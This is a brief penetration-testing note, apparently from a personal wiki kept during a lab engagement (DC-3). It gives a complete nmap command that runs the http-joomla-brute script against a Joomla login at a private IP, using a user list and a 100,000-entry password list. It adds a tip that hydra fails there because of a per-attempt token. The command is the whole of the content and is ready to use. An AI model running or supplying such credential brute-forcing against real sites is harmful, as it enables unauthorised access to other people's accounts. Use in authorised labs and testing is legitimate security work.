Skip to content

Joomla Brute Force

nmap -sV -p80 --script http-joomla-brute --script-args 'userdb=/root/engagements/dc3/user.txt, \
passdb=/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt, \
http-joomla-brute.hostname=192.168.99.19, \
http-joomla-brute.threads=3, \
brute.firstonly=true' \
192.168.99.19

You need to use this, and not hydra, because of a changing hash on each login attempt